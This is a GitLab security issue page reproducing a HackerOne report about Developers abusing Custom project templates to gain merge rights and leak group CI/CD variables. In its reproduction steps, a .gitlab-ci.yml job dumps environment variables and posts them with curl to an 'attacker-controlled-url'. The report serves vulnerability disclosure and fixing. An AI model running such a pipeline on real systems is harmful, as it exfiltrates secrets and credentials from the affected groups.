Skip to content

Developer can leak group and any subgroup’s CI/CD variables using Custom project templates functionality

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2021616 by theluci on 2023-06-12, assigned to @ottilia_westerlund:

Report | Attachments | How To Reproduce

Report

Hello,
Gitlab recently fixed several bugs that allowed a developer to import a project and leak group’s CI/CD variables. To protect against these types of attacks, Gitlab set the minimum role for importing projects to maintainer.
Gitlab also made the Custom project templates functionality reusable by developers in enterprise edition.
However, I found a bug using which a Developer can leak group or any subgroup’s CI/CD variables using Custom project templates functionality.

Background

Gitlab provides a Premium/Ultimate feature custom project templates functionality.
The owner of the top-level group can set a subgroup to be used as a source of custom templates for new projects in the group and in any of the subgroups.

Vulnerability

When issue #407374 (closed) was fixed gitlab changed importing logic as follows,
When a member imports a project where specific members are Allowed to merge/Allowed to push and merge -

high1.png

Then Gitlab replaces user_id of the member allowed to merge with the user_id of the member importing the project.
That is, the member importing the project gets Allowed to merge/Allowed to push and merge access on the protected branch.

<------------------------------------------Important---------------------------------------------->
It was probably thought that only maintainers/owners can import a project, thus, them getting allowed to merge access will not be a bug.
However, Custom project template functionality internally imports the template project.
Thus, if any maintainer, owner, or any other member has allowed to merge permission on protected branch of any of the templates. Then, developer can just import the template (using custom project template functionality) and get allowed to merge setting on the protected branch.
<------------------------------------------------------------------------------------------------------>

Steps to reproduce

(Your instance must have an ultimate trial)

  1. victim creates a group victim-group.
  2. victim creates a subgroup subgroup-to-be-template and template projects template1,template2 inside.
  3. victim goes to http://<Your_Instance_IP>/groups/<victim-group>/-/edit, Expand Custom project templates and select subgroup-to-be-template
  4. victim goes to template1 repository settings http://<Your_Instance_IP>/<victim-group>/<subgroup-to-be-template>/template1/-/settings/repository, Expand Protected branches and gives himself Allowed to merge OR Allowed to push and merge access on protected branch.

high2.png

In a real-world scenario, it may not be the owner but any member (maybe a maintainer or some other member) that has Allowed to merge/Allowed to push and merge access on protected branch of any of the templates.
It might also be possible that no roles are Allowed to merge/Allowed to push and merge but specific users (any user).

As victim,
5. victim goes to http://<Your_Instance_IP>/groups/<victim-group>/-/settings/ci_cd, **Expand Variables ** and adds some CI/CD variables.
6. victim goes to http://<Your_Instance_IP>/groups/<victim-group>/-/group_members and adds attacker as Developer.

As attacker,
7. attacker goes to victim-group, clicks on new project and chooses Create from template.
8. attacker uses template1 and creates attacker-project
attacker now have Allowed to merge/Allowed to push and merge access on protected branch of attacker-project.
9. attacker adds the following .gitlab-ci.yml file

job_name:      
 script:      
   - export > test.txt      
   - curl -X POST --data "$(cat test.txt)" attacker-controlled-url

The group's CI/CD variables are sent to attacker-controlled-url.

Output of checks

This bug happens on Self-hosted Gitlab Instance.

Results of GitLab environment info

System information  
System:         Ubuntu 20.04  
Proxy:          no  
Current User:   git  
Using RVM:      no  
Ruby Version:   3.0.6p216  
Gem Version:    3.4.13  
Bundler Version:2.4.13  
Rake Version:   13.0.6  
Redis Version:  6.2.11  
Sidekiq Version:6.5.7  
Go Version:     unknown

GitLab information  
Version:        16.0.4-ee  
Revision:       7d6834bd32e  
Directory:      /opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:     PostgreSQL  
DB Version:     13.11  
URL:            http://x.x.x.x  
HTTP Clone URL: http://x.x.x.x/some-group/some-project.git  
SSH Clone URL:  git@x.x.x.x:some-group/some-project.git  
Elasticsearch:  no  
Geo:            no  
Using LDAP:     no  
Using Omniauth: yes  
Omniauth Providers:

GitLab Shell  
Version:        14.20.0  
Repository storages:  
- default:      unix:/var/opt/gitlab/gitaly/gitaly.socket  
GitLab Shell path:              /opt/gitlab/embedded/service/gitlab-shell

Impact

Developer of a group can leak group or any subgroup’s CI/CD variables.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Edited by Kevin Morrison